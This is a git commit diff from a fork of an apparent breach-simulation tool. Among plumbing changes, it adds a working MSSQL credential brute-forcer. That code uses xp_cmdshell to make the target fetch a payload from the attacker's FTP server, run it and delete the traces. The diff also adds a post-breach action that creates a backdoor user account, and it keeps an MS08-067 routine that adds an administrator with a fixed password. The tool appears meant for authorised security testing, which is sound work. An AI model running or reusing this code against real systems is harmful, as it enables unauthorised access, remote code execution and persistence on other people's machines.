forked from p15670423/monkey
Merge branch 'develop' into feature/scan_with_ping
This commit is contained in:
commit
53228e8cea
|
@ -41,6 +41,8 @@ Setup
|
|||
-------------------------------
|
||||
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
|
||||
|
||||
The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
|
||||
|
||||
|
||||
Building the Monkey from source
|
||||
-------------------------------
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
import re
|
||||
import urllib2
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
@ -7,11 +8,28 @@ class AWS(object):
|
|||
def __init__(self):
|
||||
try:
|
||||
self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id', timeout=2).read()
|
||||
self.region = self._parse_region(
|
||||
urllib2.urlopen('http://169.254.169.254/latest/meta-data/placement/availability-zone').read())
|
||||
except urllib2.URLError:
|
||||
self.instance_id = None
|
||||
self.region = None
|
||||
|
||||
@staticmethod
|
||||
def _parse_region(region_url_response):
|
||||
# For a list of regions: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
|
||||
# This regex will find any AWS region format string in the response.
|
||||
re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
|
||||
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
|
||||
if finding:
|
||||
return finding[0]
|
||||
else:
|
||||
return None
|
||||
|
||||
def get_instance_id(self):
|
||||
return self.instance_id
|
||||
|
||||
def get_region(self):
|
||||
return self.region
|
||||
|
||||
def is_aws_instance(self):
|
||||
return self.instance_id is not None
|
||||
|
|
|
@ -7,8 +7,6 @@ from abc import ABCMeta
|
|||
from itertools import product
|
||||
import importlib
|
||||
|
||||
importlib.import_module('infection_monkey', 'network')
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
GUID = str(uuid.getnode())
|
||||
|
@ -22,6 +20,7 @@ class Configuration(object):
|
|||
# now we won't work at <2.7 for sure
|
||||
network_import = importlib.import_module('infection_monkey.network')
|
||||
exploit_import = importlib.import_module('infection_monkey.exploit')
|
||||
post_breach_import = importlib.import_module('infection_monkey.post_breach')
|
||||
|
||||
unknown_items = []
|
||||
for key, value in formatted_data.items():
|
||||
|
@ -41,6 +40,9 @@ class Configuration(object):
|
|||
elif key == 'exploiter_classes':
|
||||
class_objects = [getattr(exploit_import, val) for val in value]
|
||||
setattr(self, key, class_objects)
|
||||
elif key == 'post_breach_actions':
|
||||
class_objects = [getattr(post_breach_import, val) for val in value]
|
||||
setattr(self, key, class_objects)
|
||||
else:
|
||||
if hasattr(self, key):
|
||||
setattr(self, key, value)
|
||||
|
@ -192,7 +194,7 @@ class Configuration(object):
|
|||
9200]
|
||||
tcp_target_ports.extend(HTTP_PORTS)
|
||||
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
||||
tcp_scan_interval = 200
|
||||
tcp_scan_interval = 0
|
||||
tcp_scan_get_banner = True
|
||||
|
||||
# Ping Scanner
|
||||
|
@ -205,8 +207,8 @@ class Configuration(object):
|
|||
skip_exploit_if_file_exist = False
|
||||
|
||||
ms08_067_exploit_attempts = 5
|
||||
ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
|
||||
ms08_067_remote_user_pass = "Password1!"
|
||||
user_to_add = "Monkey_IUSER_SUPPORT"
|
||||
remote_user_pass = "Password1!"
|
||||
|
||||
# rdp exploiter
|
||||
rdp_use_vbs_download = True
|
||||
|
@ -267,5 +269,7 @@ class Configuration(object):
|
|||
|
||||
extract_azure_creds = True
|
||||
|
||||
post_breach_actions = []
|
||||
|
||||
|
||||
WormConfiguration = Configuration()
|
||||
|
|
|
@ -41,7 +41,8 @@
|
|||
"SambaCryExploiter",
|
||||
"Struts2Exploiter",
|
||||
"WebLogicExploiter",
|
||||
"HadoopExploiter"
|
||||
"HadoopExploiter",
|
||||
"MSSQLExploiter"
|
||||
],
|
||||
"finger_classes": [
|
||||
"SSHFinger",
|
||||
|
@ -57,8 +58,8 @@
|
|||
"monkey_log_path_linux": "/tmp/user-1563",
|
||||
"send_log_to_server": true,
|
||||
"ms08_067_exploit_attempts": 5,
|
||||
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
|
||||
"ms08_067_remote_user_pass": "Password1!",
|
||||
"user_to_add": "Monkey_IUSER_SUPPORT",
|
||||
"remote_user_pass": "Password1!",
|
||||
"ping_scan_timeout": 10000,
|
||||
"rdp_use_vbs_download": true,
|
||||
"smb_download_timeout": 300,
|
||||
|
@ -78,7 +79,7 @@
|
|||
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
||||
"local_network_scan": false,
|
||||
"tcp_scan_get_banner": true,
|
||||
"tcp_scan_interval": 200,
|
||||
"tcp_scan_interval": 0,
|
||||
"tcp_scan_timeout": 10000,
|
||||
"tcp_target_ports": [
|
||||
22,
|
||||
|
@ -96,5 +97,6 @@
|
|||
"timeout_between_iterations": 10,
|
||||
"use_file_logging": true,
|
||||
"victims_max_exploit": 7,
|
||||
"victims_max_find": 30
|
||||
"victims_max_find": 30,
|
||||
"post_breach_actions" : []
|
||||
}
|
||||
|
|
|
@ -45,3 +45,4 @@ from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
|
|||
from infection_monkey.exploit.struts2 import Struts2Exploiter
|
||||
from infection_monkey.exploit.weblogic import WebLogicExploiter
|
||||
from infection_monkey.exploit.hadoop import HadoopExploiter
|
||||
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
|
||||
|
|
|
@ -8,7 +8,7 @@ import json
|
|||
import logging
|
||||
import requests
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
|
||||
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX
|
||||
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
|
||||
|
||||
import re
|
||||
|
@ -34,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
||||
exploit_config['dropper'] = True
|
||||
exploit_config['url_extensions'] = ['_search?pretty']
|
||||
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
|
||||
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX+" "+RDP_CMDLINE_HTTP}
|
||||
return exploit_config
|
||||
|
||||
def get_open_service_ports(self, port_list, names):
|
||||
|
@ -63,3 +63,20 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
||||
except (KeyError, IndexError):
|
||||
return None
|
||||
|
||||
def check_if_exploitable(self, url):
|
||||
# Overridden web_rce method that adds CMD prefix for windows command
|
||||
try:
|
||||
if 'windows' in self.host.os['type']:
|
||||
resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
|
||||
else:
|
||||
resp = self.exploit(url, CHECK_COMMAND)
|
||||
if resp is True:
|
||||
return True
|
||||
elif resp is not False and ID_STRING in resp:
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
except Exception as e:
|
||||
LOG.error("Host's exploitability check failed due to: %s" % e)
|
||||
return False
|
|
@ -0,0 +1,128 @@
|
|||
import os
|
||||
import platform
|
||||
from os import path
|
||||
import logging
|
||||
|
||||
import pymssql
|
||||
|
||||
from infection_monkey.exploit import HostExploiter, mssqlexec_utils
|
||||
|
||||
__author__ = 'Maor Rayzin'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class MSSQLExploiter(HostExploiter):
|
||||
|
||||
_TARGET_OS_TYPE = ['windows']
|
||||
LOGIN_TIMEOUT = 15
|
||||
SQL_DEFAULT_TCP_PORT = '1433'
|
||||
DEFAULT_PAYLOAD_PATH = os.path.expandvars(r'%TEMP%\~PLD123.bat') if platform.system() else '/tmp/~PLD123.bat'
|
||||
|
||||
def __init__(self, host):
|
||||
super(MSSQLExploiter, self).__init__(host)
|
||||
self._config = __import__('config').WormConfiguration
|
||||
self.attacks_list = [mssqlexec_utils.CmdShellAttack]
|
||||
|
||||
def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH):
|
||||
"""
|
||||
This function creates dynamically the payload file to be transported and ran on the exploited machine.
|
||||
:param payload_path: A path to the create the payload file in
|
||||
:return: True if the payload file was created and false otherwise.
|
||||
"""
|
||||
try:
|
||||
with open(payload_path, 'w+') as payload_file:
|
||||
payload_file.write('dir C:\\')
|
||||
return True
|
||||
except Exception as e:
|
||||
LOG.error("Payload file couldn't be created", exc_info=True)
|
||||
return False
|
||||
|
||||
def exploit_host(self):
|
||||
"""
|
||||
Main function of the mssql brute force
|
||||
Return:
|
||||
True or False depends on process success
|
||||
"""
|
||||
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||
|
||||
if not self.create_payload_file():
|
||||
return False
|
||||
if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
|
||||
self.DEFAULT_PAYLOAD_PATH):
|
||||
LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
|
||||
return True
|
||||
else:
|
||||
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||
return False
|
||||
|
||||
def handle_payload(self, cursor, payload):
|
||||
|
||||
"""
|
||||
Handles the process of payload sending and execution, prepares the attack and details.
|
||||
|
||||
Args:
|
||||
cursor (pymssql.conn.cursor obj): A cursor of a connected pymssql.connect obj to user for commands.
|
||||
payload (string): Payload path
|
||||
|
||||
Return:
|
||||
True or False depends on process success
|
||||
"""
|
||||
|
||||
chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr)
|
||||
|
||||
if chosen_attack.send_payload():
|
||||
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
||||
if chosen_attack.execute_payload():
|
||||
LOG.debug('Payload: {0} has been successfully executed on host'.format(payload))
|
||||
chosen_attack.cleanup_files()
|
||||
return True
|
||||
else:
|
||||
LOG.error("Payload: {0} couldn't be executed".format(payload))
|
||||
else:
|
||||
LOG.error("Payload: {0} couldn't be sent to host".format(payload))
|
||||
|
||||
chosen_attack.cleanup_files()
|
||||
return False
|
||||
|
||||
def brute_force_begin(self, host, port, users_passwords_pairs_list, payload):
|
||||
"""
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
Main loop starts here.
|
||||
|
||||
Args:
|
||||
host (str): Host ip address
|
||||
port (str): Tcp port that the host listens to
|
||||
payload (str): Local path to the payload
|
||||
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
|
||||
|
||||
Return:
|
||||
True or False depends if the whole bruteforce and attack process was completed successfully or not
|
||||
"""
|
||||
# Main loop
|
||||
# Iterates on users list
|
||||
for user, password in users_passwords_pairs_list:
|
||||
try:
|
||||
# Core steps
|
||||
# Trying to connect
|
||||
conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
|
||||
LOG.info('Successfully connected to host: {0}, '
|
||||
'using user: {1}, password: {2}'.format(host, user, password))
|
||||
self.report_login_attempt(True, user, password)
|
||||
cursor = conn.cursor()
|
||||
|
||||
# Handles the payload and return True or False
|
||||
if self.handle_payload(cursor, payload):
|
||||
LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host))
|
||||
return True
|
||||
else:
|
||||
LOG.warning("user: {0} and password: {1}, "
|
||||
"was able to connect to host: {2} but couldn't handle payload: {3}"
|
||||
.format(user, password, host, payload))
|
||||
except pymssql.OperationalError:
|
||||
# Combo didn't work, hopping to the next one
|
||||
pass
|
||||
|
||||
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
|
||||
'aborting brute force'.format(host, port))
|
||||
return False
|
|
@ -0,0 +1,214 @@
|
|||
import os
|
||||
import multiprocessing
|
||||
import logging
|
||||
|
||||
import pymssql
|
||||
|
||||
from infection_monkey.exploit.tools import get_interface_to_target
|
||||
from pyftpdlib.authorizers import DummyAuthorizer
|
||||
from pyftpdlib.handlers import FTPHandler
|
||||
from pyftpdlib.servers import FTPServer
|
||||
|
||||
|
||||
__author__ = 'Maor Rayzin'
|
||||
|
||||
|
||||
FTP_SERVER_PORT = 1026
|
||||
FTP_SERVER_ADDRESS = ''
|
||||
FTP_SERVER_USER = 'brute'
|
||||
FTP_SERVER_PASSWORD = 'force'
|
||||
FTP_WORKING_DIR = '.'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class FTP(object):
|
||||
|
||||
"""Configures and establish an FTP server with default details.
|
||||
|
||||
Args:
|
||||
user (str): User for FTP server auth
|
||||
password (str): Password for FTP server auth
|
||||
working_dir (str): The local working dir to init the ftp server on.
|
||||
|
||||
"""
|
||||
|
||||
def __init__(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
|
||||
working_dir=FTP_WORKING_DIR):
|
||||
"""Look at class level docstring."""
|
||||
|
||||
self.user = user
|
||||
self.password = password
|
||||
self.working_dir = working_dir
|
||||
|
||||
def run_server(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
|
||||
working_dir=FTP_WORKING_DIR):
|
||||
|
||||
""" Configures and runs the ftp server to listen forever until stopped.
|
||||
|
||||
Args:
|
||||
user (str): User for FTP server auth
|
||||
password (str): Password for FTP server auth
|
||||
working_dir (str): The local working dir to init the ftp server on.
|
||||
"""
|
||||
|
||||
# Defining an authorizer and configuring the ftp user
|
||||
authorizer = DummyAuthorizer()
|
||||
authorizer.add_user(user, password, working_dir, perm='elradfmw')
|
||||
|
||||
# Normal ftp handler
|
||||
handler = FTPHandler
|
||||
handler.authorizer = authorizer
|
||||
|
||||
address = (FTP_SERVER_ADDRESS, FTP_SERVER_PORT)
|
||||
|
||||
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
||||
self.server = FTPServer(address, handler)
|
||||
|
||||
# Starting ftp server, this server has no auto stop or stop clause, and also, its blocking on use, thats why I
|
||||
# multiproccess is being used here.
|
||||
self.server.serve_forever()
|
||||
|
||||
def stop_server(self):
|
||||
# Stops the FTP server and closing all connections.
|
||||
self.server.close_all()
|
||||
|
||||
|
||||
class AttackHost(object):
|
||||
"""
|
||||
This class acts as an interface for the attacking methods class
|
||||
|
||||
Args:
|
||||
payload_path (str): The local path of the payload file
|
||||
"""
|
||||
|
||||
def __init__(self, payload_path):
|
||||
self.payload_path = payload_path
|
||||
|
||||
def send_payload(self):
|
||||
raise NotImplementedError("Send function not implemented")
|
||||
|
||||
def execute_payload(self):
|
||||
raise NotImplementedError("execute function not implemented")
|
||||
|
||||
|
||||
class CmdShellAttack(AttackHost):
|
||||
|
||||
"""
|
||||
This class uses the xp_cmdshell command execution and will work only if its available on the remote host.
|
||||
|
||||
Args:
|
||||
payload_path (str): The local path of the payload file
|
||||
cursor (pymssql.conn.obj): A cursor object from pymssql.connect to run commands with.
|
||||
|
||||
"""
|
||||
|
||||
def __init__(self, payload_path, cursor, dst_ip_address):
|
||||
super(CmdShellAttack, self).__init__(payload_path)
|
||||
self.ftp_server, self.ftp_server_p = self.__init_ftp_server()
|
||||
self.cursor = cursor
|
||||
self.attacker_ip = get_interface_to_target(dst_ip_address)
|
||||
|
||||
def send_payload(self):
|
||||
"""
|
||||
Sets up an FTP server and using it to download the payload to the remote host
|
||||
|
||||
Return:
|
||||
True if payload sent False if not.
|
||||
"""
|
||||
|
||||
# Sets up the cmds to run
|
||||
shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \
|
||||
echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER)
|
||||
shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD)
|
||||
|
||||
shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\
|
||||
.format(self.payload_path)
|
||||
shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """
|
||||
shellcmds = [shellcmd1, shellcmd2, shellcmd3, shellcmd4]
|
||||
|
||||
# Checking to see if ftp server is up
|
||||
if self.ftp_server_p and self.ftp_server:
|
||||
|
||||
try:
|
||||
# Running the cmd on remote host
|
||||
for cmd in shellcmds:
|
||||
self.cursor.execute(cmd)
|
||||
except Exception as e:
|
||||
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
return True
|
||||
else:
|
||||
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||
return False
|
||||
|
||||
def execute_payload(self):
|
||||
|
||||
"""
|
||||
Executes the payload after ftp drop
|
||||
|
||||
Return:
|
||||
True if payload was executed successfully, False if not.
|
||||
"""
|
||||
|
||||
# Getting the payload's file name
|
||||
payload_file_name = os.path.split(self.payload_path)[1]
|
||||
|
||||
# Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
|
||||
shellcmd = """DECLARE @i INT \
|
||||
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
||||
SELECT @i """.format(payload_file_name)
|
||||
|
||||
try:
|
||||
# Executing payload on remote host
|
||||
LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||
self.cursor.execute(shellcmd)
|
||||
if self.cursor.fetchall()[0][0] == 0:
|
||||
# Success
|
||||
self.ftp_server_p.terminate()
|
||||
LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||
return True
|
||||
else:
|
||||
LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
|
||||
except pymssql.OperationalError:
|
||||
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
|
||||
def cleanup_files(self):
|
||||
"""
|
||||
Cleans up the folder with the attack related files (C:\\tmp by default)
|
||||
:return: True or False if command executed or not.
|
||||
"""
|
||||
cleanup_command = """xp_cmdshell "rd /s /q c:\\tmp" """
|
||||
try:
|
||||
self.cursor.execute(cleanup_command)
|
||||
LOG.info('Attack files cleanup command has been sent.')
|
||||
return True
|
||||
except Exception as e:
|
||||
LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True)
|
||||
return False
|
||||
|
||||
def __init_ftp_server(self):
|
||||
"""
|
||||
Init an FTP server using FTP class on a different process
|
||||
|
||||
Return:
|
||||
ftp_s: FTP server object
|
||||
p: the process obj of the FTP object
|
||||
"""
|
||||
|
||||
try:
|
||||
ftp_s = FTP()
|
||||
multiprocessing.log_to_stderr(logging.DEBUG)
|
||||
p = multiprocessing.Process(target=ftp_s.run_server)
|
||||
p.start()
|
||||
LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||
return ftp_s, p
|
||||
except Exception as e:
|
||||
LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
|
||||
return None, None
|
|
@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
|
||||
sock.send("cmd /c (net user %s %s /add) &&"
|
||||
" (net localgroup administrators %s /add)\r\n" %
|
||||
(self._config.ms08_067_remote_user_add,
|
||||
self._config.ms08_067_remote_user_pass,
|
||||
self._config.ms08_067_remote_user_add))
|
||||
(self._config.user_to_add,
|
||||
self._config.remote_user_pass,
|
||||
self._config.user_to_add))
|
||||
time.sleep(2)
|
||||
reply = sock.recv(1000)
|
||||
|
||||
|
@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
remote_full_path = SmbTools.copy_file(self.host,
|
||||
src_path,
|
||||
self._config.dropper_target_path_win_32,
|
||||
self._config.ms08_067_remote_user_add,
|
||||
self._config.ms08_067_remote_user_pass)
|
||||
self._config.user_to_add,
|
||||
self._config.remote_user_pass)
|
||||
|
||||
if not remote_full_path:
|
||||
# try other passwords for administrator
|
||||
|
@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
|
||||
try:
|
||||
sock.send("start %s\r\n" % (cmdline,))
|
||||
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
|
||||
sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
|
||||
except Exception as exc:
|
||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
||||
return False
|
||||
|
|
|
@ -24,6 +24,8 @@ CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
|||
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||
# Commands used to check for architecture and if machine is exploitable
|
||||
CHECK_COMMAND = "echo %s" % ID_STRING
|
||||
# CMD prefix for windows commands
|
||||
CMD_PREFIX = "cmd.exe /c"
|
||||
# Architecture checking commands
|
||||
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
|
||||
GET_ARCH_LINUX = "lscpu"
|
||||
|
|
|
@ -109,6 +109,10 @@ class InfectionMonkey(object):
|
|||
system_info = system_info_collector.get_info()
|
||||
ControlClient.send_telemetry("system_info_collection", system_info)
|
||||
|
||||
for action_class in WormConfiguration.post_breach_actions:
|
||||
action = action_class()
|
||||
action.act()
|
||||
|
||||
if 0 == WormConfiguration.depth:
|
||||
LOG.debug("Reached max depth, shutting down")
|
||||
ControlClient.send_telemetry("trace", "Reached max depth, shutting down")
|
||||
|
|
|
@ -107,8 +107,8 @@ class NetworkScanner(object):
|
|||
|
||||
break
|
||||
|
||||
if SCAN_DELAY:
|
||||
time.sleep(SCAN_DELAY)
|
||||
if WormConfiguration.tcp_scan_interval:
|
||||
time.sleep(WormConfiguration.tcp_scan_interval)
|
||||
|
||||
@staticmethod
|
||||
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
|
||||
|
|
|
@ -0,0 +1,4 @@
|
|||
__author__ = 'danielg'
|
||||
|
||||
|
||||
from add_user import BackdoorUser
|
|
@ -0,0 +1,49 @@
|
|||
import datetime
|
||||
import logging
|
||||
import subprocess
|
||||
import sys
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
# Linux doesn't have WindowsError
|
||||
try:
|
||||
WindowsError
|
||||
except NameError:
|
||||
WindowsError = None
|
||||
|
||||
__author__ = 'danielg'
|
||||
|
||||
|
||||
class BackdoorUser(object):
|
||||
"""
|
||||
This module adds a disabled user to the system.
|
||||
This tests part of the ATT&CK matrix
|
||||
"""
|
||||
|
||||
def act(self):
|
||||
LOG.info("Adding a user")
|
||||
if sys.platform.startswith("win"):
|
||||
retval = self.add_user_windows()
|
||||
else:
|
||||
retval = self.add_user_linux()
|
||||
if retval != 0:
|
||||
LOG.warn("Failed to add a user")
|
||||
else:
|
||||
LOG.info("Done adding user")
|
||||
|
||||
@staticmethod
|
||||
def add_user_linux():
|
||||
cmd_line = ['useradd', '-M', '--expiredate',
|
||||
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
|
||||
WormConfiguration.user_to_add]
|
||||
retval = subprocess.call(cmd_line)
|
||||
return retval
|
||||
|
||||
@staticmethod
|
||||
def add_user_windows():
|
||||
cmd_line = ['net', 'user', WormConfiguration.user_to_add,
|
||||
WormConfiguration.remote_user_pass,
|
||||
'/add', '/ACTIVE:NO']
|
||||
retval = subprocess.call(cmd_line)
|
||||
return retval
|
|
@ -15,3 +15,6 @@ ecdsa
|
|||
netifaces
|
||||
ipaddress
|
||||
wmi
|
||||
pywin32
|
||||
pymssql
|
||||
pyftpdlib
|
|
@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
|
|||
"""
|
||||
LOG.debug("Running Windows collector")
|
||||
super(WindowsInfoCollector, self).get_info()
|
||||
self.get_wmi_info()
|
||||
#self.get_wmi_info()
|
||||
self.get_installed_packages()
|
||||
from infection_monkey.config import WormConfiguration
|
||||
if WormConfiguration.should_use_mimikatz:
|
||||
|
|
|
@ -18,6 +18,7 @@ from cc.resources.log import Log
|
|||
from cc.resources.island_logs import IslandLog
|
||||
from cc.resources.monkey import Monkey
|
||||
from cc.resources.monkey_configuration import MonkeyConfiguration
|
||||
from cc.resources.island_configuration import IslandConfiguration
|
||||
from cc.resources.monkey_download import MonkeyDownload
|
||||
from cc.resources.netmap import NetMap
|
||||
from cc.resources.node import Node
|
||||
|
@ -104,6 +105,7 @@ def init_app(mongo_url):
|
|||
api.add_resource(ClientRun, '/api/client-monkey', '/api/client-monkey/')
|
||||
api.add_resource(Telemetry, '/api/telemetry', '/api/telemetry/', '/api/telemetry/<string:monkey_guid>')
|
||||
api.add_resource(MonkeyConfiguration, '/api/configuration', '/api/configuration/')
|
||||
api.add_resource(IslandConfiguration, '/api/configuration/island', '/api/configuration/island/')
|
||||
api.add_resource(MonkeyDownload, '/api/monkey/download', '/api/monkey/download/',
|
||||
'/api/monkey/download/<string:path>')
|
||||
api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
|
||||
|
|
|
@ -8,11 +8,15 @@ __author__ = 'itay.mizeretz'
|
|||
class AwsEnvironment(Environment):
|
||||
def __init__(self):
|
||||
super(AwsEnvironment, self).__init__()
|
||||
self._instance_id = AwsEnvironment._get_instance_id()
|
||||
self.aws_info = AWS()
|
||||
self._instance_id = self._get_instance_id()
|
||||
self.region = self._get_region()
|
||||
|
||||
@staticmethod
|
||||
def _get_instance_id():
|
||||
return AWS.get_instance_id()
|
||||
def _get_instance_id(self):
|
||||
return self.aws_info.get_instance_id()
|
||||
|
||||
def _get_region(self):
|
||||
return self.aws_info.get_region()
|
||||
|
||||
def is_auth_enabled(self):
|
||||
return True
|
||||
|
|
|
@ -5,6 +5,8 @@ import aws
|
|||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
AWS = 'aws'
|
||||
STANDARD = 'standard'
|
||||
|
||||
ENV_DICT = {
|
||||
'standard': standard.StandardEnvironment,
|
||||
|
@ -12,13 +14,16 @@ ENV_DICT = {
|
|||
}
|
||||
|
||||
|
||||
def load_env_from_file():
|
||||
def load_server_configuration_from_file():
|
||||
with open('monkey_island/cc/server_config.json', 'r') as f:
|
||||
config_content = f.read()
|
||||
config_json = json.loads(config_content)
|
||||
return config_json['server_config']
|
||||
return json.loads(config_content)
|
||||
|
||||
|
||||
def load_env_from_file():
|
||||
config_json = load_server_configuration_from_file()
|
||||
return config_json['server_config']
|
||||
|
||||
try:
|
||||
__env_type = load_env_from_file()
|
||||
env = ENV_DICT[__env_type]()
|
||||
|
|
|
@ -0,0 +1,19 @@
|
|||
from cc.environment.environment import load_env_from_file, AWS
|
||||
from cc.report_exporter_manager import ReportExporterManager
|
||||
from cc.resources.aws_exporter import AWSExporter
|
||||
|
||||
__author__ = 'maor.rayzin'
|
||||
|
||||
|
||||
def populate_exporter_list():
|
||||
|
||||
manager = ReportExporterManager()
|
||||
if is_aws_exporter_required():
|
||||
manager.add_exporter_to_list(AWSExporter)
|
||||
|
||||
|
||||
def is_aws_exporter_required():
|
||||
if str(load_env_from_file()) == AWS:
|
||||
return True
|
||||
else:
|
||||
return False
|
|
@ -18,6 +18,7 @@ json_setup_logging(default_path=os.path.join(BASE_PATH, 'cc', 'island_logger_def
|
|||
logger = logging.getLogger(__name__)
|
||||
|
||||
from cc.app import init_app
|
||||
from cc.exporter_init import populate_exporter_list
|
||||
from cc.utils import local_ip_addresses
|
||||
from cc.environment.environment import env
|
||||
from cc.database import is_db_server_up
|
||||
|
@ -34,6 +35,7 @@ def main():
|
|||
logger.info('Waiting for MongoDB server')
|
||||
time.sleep(1)
|
||||
|
||||
populate_exporter_list()
|
||||
app = init_app(mongo_url)
|
||||
if env.is_debug():
|
||||
app.run(host='0.0.0.0', debug=True, ssl_context=('monkey_island/cc/server.crt', 'monkey_island/cc/server.key'))
|
||||
|
@ -44,6 +46,7 @@ def main():
|
|||
http_server.listen(env.get_island_port())
|
||||
logger.info(
|
||||
'Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))
|
||||
|
||||
IOLoop.instance().start()
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
import logging
|
||||
|
||||
__author__ = 'maor.rayzin'
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class Singleton(type):
|
||||
_instances = {}
|
||||
|
||||
def __call__(cls, *args, **kwargs):
|
||||
if cls not in cls._instances:
|
||||
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
|
||||
return cls._instances[cls]
|
||||
|
||||
|
||||
class ReportExporterManager(object):
|
||||
__metaclass__ = Singleton
|
||||
|
||||
def __init__(self):
|
||||
self._exporters_set = set()
|
||||
|
||||
def get_exporters_list(self):
|
||||
return self._exporters_set
|
||||
|
||||
def add_exporter_to_list(self, exporter):
|
||||
self._exporters_set.add(exporter)
|
||||
|
||||
def export(self, report):
|
||||
try:
|
||||
for exporter in self._exporters_set:
|
||||
exporter().handle_report(report)
|
||||
except Exception as e:
|
||||
logger.exception('Failed to export report')
|
|
@ -0,0 +1,411 @@
|
|||
import logging
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
import boto3
|
||||
from botocore.exceptions import UnknownServiceError
|
||||
|
